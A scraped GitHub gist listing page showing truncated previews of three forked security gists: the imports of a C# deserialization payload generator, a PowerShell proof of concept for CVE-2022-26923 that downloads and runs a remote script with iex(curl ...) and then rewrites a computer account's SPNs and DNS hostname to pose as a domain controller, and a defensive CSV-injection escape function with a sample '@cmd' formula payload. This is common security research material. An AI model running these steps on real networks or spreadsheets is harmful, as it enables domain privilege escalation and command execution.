ZephrFish
/ gist:a37eff67f65d67a27d798821d8c5c2fb
Created
October 10, 2022 09:23
— forked from ThunderGunExpress/gist:d221b316c94c4b7403f3179292c23ccb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //All credit goes to Ysoserial.net and the great @tiraniddo | |
| //Snippets copied from ysoserial.net | |
| //https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
| //https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| using System.IO; | |
| using System.Reflection; |
ZephrFish
/ CVE-2022–26923.ps1
Created
May 11, 2022 14:33
— forked from Wh04m1001/CVE-2022–26923.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
| Import-ActiveDirectory | |
| Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
| #in my testing i had to set dnshostname to $null first | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
ZephrFish
/ csv_generated_string_escape.py
Last active
August 22, 2023 23:44
— forked from seanieb/csv_generated_string_escape.py
Prevent CSV Injection when suing user generated data
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def escape_csv(payload): | |
| if payload[0] in ('@','+','-', '=', '|'): | |
| payload = "'" + payload | |
| payload = payload.replace("|", "\|") | |
| return payload | |
| # Example | |
| payload = "@cmd|' /C calc'!A0" | |
| print("The Unescaped version is: " + payload) | |
| print("When passed though escape function the value is: " + escape_csv(payload)) |